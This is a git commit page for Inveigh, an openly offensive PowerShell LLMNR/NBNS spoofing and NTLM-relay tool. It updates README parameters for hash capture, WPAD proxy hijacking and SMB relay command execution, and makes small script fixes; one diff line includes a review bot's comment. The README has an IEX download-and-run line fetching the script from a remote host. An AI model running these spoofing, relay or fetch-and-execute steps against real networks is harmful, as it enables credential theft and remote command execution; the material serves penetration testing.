authorKevin Robertson <robertsonk@gmail.com>2017-03-27 22:35:34 -0400
committerKevin Robertson <robertsonk@gmail.com>2017-03-27 22:35:34 -0400
commit5e0baa7b5fdd109d8c959205b3abc8dbbc5bdddb (patch)
treef62826efce14b250fef229e6583ca4e1051e569e
parent2bddbb9413aaad4c0e01c69f3d954f0d8e4cc707 (diff)
bug fixes and partial readme update
-rw-r--r--README.md153
-rw-r--r--Scripts/Inveigh-Relay.ps118
-rw-r--r--Scripts/Inveigh.ps137
3 files changed, 83 insertions, 125 deletions
diff --git a/README.md b/README.md
index b177ceb..86f5c40 100644
--- a/README.md
+++ b/README.md
@@ -4,7 +4,10 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
## Included In
* PowerShell Empire - https://github.com/PowerShellEmpire/Empire
* PS>Attack - https://github.com/jaredhaight/psattack
-* p0wnedShell - https://github.com/Cn33liz/p0wnedShell
+* p0wnedShell - https://github.com/Cn33liz/p0wnedShell
+* PowerUpSQL - https://github.com/NetSPI/PowerUpSQL
+* PoshC2 - https://github.com/nettitude/PoshC2
+* pupy - https://github.com/n1nj4sec/pupy
## Special Thanks
* Anyone that posted .NET packet sniffing examples.
@@ -17,12 +20,10 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* To import using the dot source method:
. ./Inveigh.ps1
- . ./Inveigh-BruteForce.ps1
. ./Inveigh-Relay.ps1
* To load into memory using Invoke-Expression:
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1")
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
## System Requirements
@@ -30,7 +31,6 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
## Functions
* Invoke-Inveigh
-* Invoke-InveighUnprivileged
* Invoke-InveighRelay
* Clear-Inveigh
* Get-Inveigh
@@ -40,9 +40,6 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
### Invoke-Inveigh
* The main Inveigh LLMNR/NBNS spoofer function.
-##### Privilege Requirements:
-* Elevated Administrator or SYSTEM
-
##### Features:
* IPv4 LLMNR/NBNS spoofer with granular control
* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
@@ -74,7 +71,8 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
![inveigh](https://cloud.githubusercontent.com/assets/5897462/18420523/924f9c7a-7842-11e6-984e-153058b28016.png)
##### Parameters:
-* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
+* __ElevatedPrivilege__ - Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used.
+* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning.
* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
@@ -89,26 +87,41 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer.
+* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+* __HTTPIP__ - Default = Any: IP address for the HTTP listener.
+* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
+* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener.
+* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+* __HTTPContentType__ - Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse.
* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
-* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate.
-* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
-* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
+* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
+* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener.
+* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
+* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS.
+* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
+* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+* __WPADDirectFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
+* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures.
+* __ProxyAuth__ - Default = NTLM: (Basic,NTLM,NTLMNoESS) Proxy server authentication type.
+* __ProxyIP__ - Default = Any: IP address for the proxy listener.
+* __ProxyPort__ - Default = 8492: TCP port for the proxy listener.
+* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening.
* __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host.
* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
@@ -117,92 +130,15 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+* __StartupChecks__ - Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+* __RunCount__ - Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2 captures to perform before auto-exiting.
* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
-### Invoke-InveighUnprivileged
-* Inveigh LLMNR/NBNS spoofer function that does not require local administrator access.
-
-##### Privilege Requirements:
-* Regular User
-
-##### Features:
-* IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service
-* IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled
-* Targeted IPv4 NBNS brute force spoofer with granular control
-* NTLMv1/NTLMv2 challenge/response capture over HTTP
-* Basic auth cleartext credential capture over HTTP
-* WPAD server capable of hosting a basic or custom wpad.dat file
-* HTTP server capable of hosting limited content
-* Granular control of console and file output
-* Run time control
-
-##### Notes:
-* The local NBNS service does not need to be disabled on the host system.
-* Ensure that any needed LMMNR, NBNS, HTTP ports are open within any local firewall on the host system.
-* Migrating/injecting into a process that has already been allowed incoming/outgoing firewall access should also work.
-* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
-* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June.
-
-##### Examples:
-* To execute with default settings:
- Invoke-InveighUnprivileged
-
-* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes.
- Invoke-InveighUnprivileged -ConsoleOutput Y -FileOutput Y -RunTime 30
-
-##### Screenshot:
-![inveigh-unprivileged](https://cloud.githubusercontent.com/assets/5897462/18420530/a6645a02-7842-11e6-8d2c-bd5ff04813fe.png)
-
-##### Parameters:
-* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host.
-* __SpooferTarget__ - IP address to target for brute force NBNS spoofing.
-* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
-* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
-* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
-* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
-* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
-* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
-* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
-* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
-* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
-* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
-* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer.
-* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
-* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-* __HTTPIP__ - Default = Any: IP address for the HTTP listener.
-* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
-* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary.
-* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
-* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
-* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
-* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
-* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
-* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
-* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
-* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
-* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
-* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
-* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled.
-* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
-* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
-* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
-* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
-* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
-
### Invoke-InveighRelay
* The NTLMv2 HTTP/HTTPS to SMB relay command execution function. This function can be used with or without Invoke-Inveigh.
-##### Privilege Requirements:
-* Elevated Administrator or SYSTEM
-
##### Features:
* HTTP/HTTPS to SMB NTLMv2 relay with granular control
* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
@@ -221,25 +157,36 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
![inveigh-relay](https://cloud.githubusercontent.com/assets/5897462/18420526/9991a758-7842-11e6-90b2-9d519ff03c28.png)
##### Parameters:
+* __Command__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
+* __Target__ - IP address of system to target for SMB relay.
+* __Service__ - Default = 20 Character Random: Name of the service to create and delete on the target.
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+* __HTTPIP__ - Default = Any: IP address for the HTTP/HTTPS listener.
+* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate.
-* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
+* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS.
+* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
-* __SMBRelayTarget__ - IP address of system to target for SMB relay.
-* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
-* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
-* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
-* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures.
+* __ProxyIP__ - Default = Any: IP address for the proxy listener.
+* __ProxyPort__ - Default = 8492: TCP port for the proxy listener.
+* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening.
+* __Usernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
+* __RelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
+* __RelayAutoExit__ - Default = Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
+* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
+* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
+* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
+* __SMB1__ - (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
##### Notes:
@@ -248,7 +195,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
### Support Functions
* __Clear-Inveigh__ - Clear Inveigh data from memory
-* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames
+* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames, POSTRequest, POSTRequestUnique
* __Stop-Inveigh__ - Stop all running Inveigh functions
* __Watch-Inveigh__ - Enable real time console output
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index e2ed0bb..983ac0c 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -90,7 +90,7 @@ target.
Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
.PARAMETER ConsoleOutput
-Default = Disabled: (N,Y,Medium,Low) Enable/Disable real time console output. If using this option through a shell, test to
+Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to
ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
.PARAMETER ConsoleStatus
@@ -164,7 +164,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$Usernames = "",
@@ -188,9 +188,9 @@ if ($invalid_parameter)
throw
}
-if(!$ProxyIP)
+if($ProxyIP -eq '0.0.0.0')
{
- $ProxyIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
}
if(!$OutputDir)
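Review bot: `$proxy_WPAD_IP` is only assigned when `$ProxyIP` is exactly '0.0.0.0', so an operator who passes an explicit `-ProxyIP` leaves it unset, and the wpad.dat built in the later hunk (`$WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; ..."`) then advertises an empty proxy host unless the variable is assigned somewhere outside this diff. The Inveigh.ps1 hunk in this same commit adds the missing fallback (`else { $proxy_WPAD_IP = $ProxyIP }`) but Inveigh-Relay.ps1 does not get the equivalent branch, so the two scripts now diverge. Add the same `else` here so the check reads `if($ProxyIP -eq '0.0.0.0') { $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) } else { $proxy_WPAD_IP = $ProxyIP }`. A one-line comment above the block such as `# $ProxyIP is the bind address; $proxy_WPAD_IP is the address advertised to clients in wpad.dat` would make the split between the two variables clear to the next reader.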
@@ -492,7 +492,7 @@ if($Proxy -eq 'Y')
{
$inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
$ProxyPortFailover = $ProxyPort + 1
- $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $ProxyIP`:$ProxyPort; PROXY $ProxyIP`:$ProxyPortFailover; DIRECT`";}"
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
$ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
if($ProxyIgnore.Count -gt 0)
@@ -1813,8 +1813,8 @@ $SMB_relay_response_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
{
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")])
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")])
$SMB_relay_failed = $true
}
else
@@ -2249,8 +2249,8 @@ $SMB_relay_response_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
{
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")])
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")])
$SMB_relay_failed = $true
}
else
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 0442f54..51b7d84 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -103,7 +103,7 @@ wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag duri
Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
.PARAMETER HTTPContentType
-Default = none: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta"
+Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta"
for HTA files or when using HTA code with HTTPResponse.
.PARAMETER HTTPDir
@@ -195,7 +195,7 @@ challenge will be generated for each request.
Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
.PARAMETER ConsoleOutput
-Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to
ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
.PARAMETER ConsoleStatus
@@ -535,6 +535,7 @@ if(!$elevated_privilege)
}
+$inveigh.hostname_spoof = $false
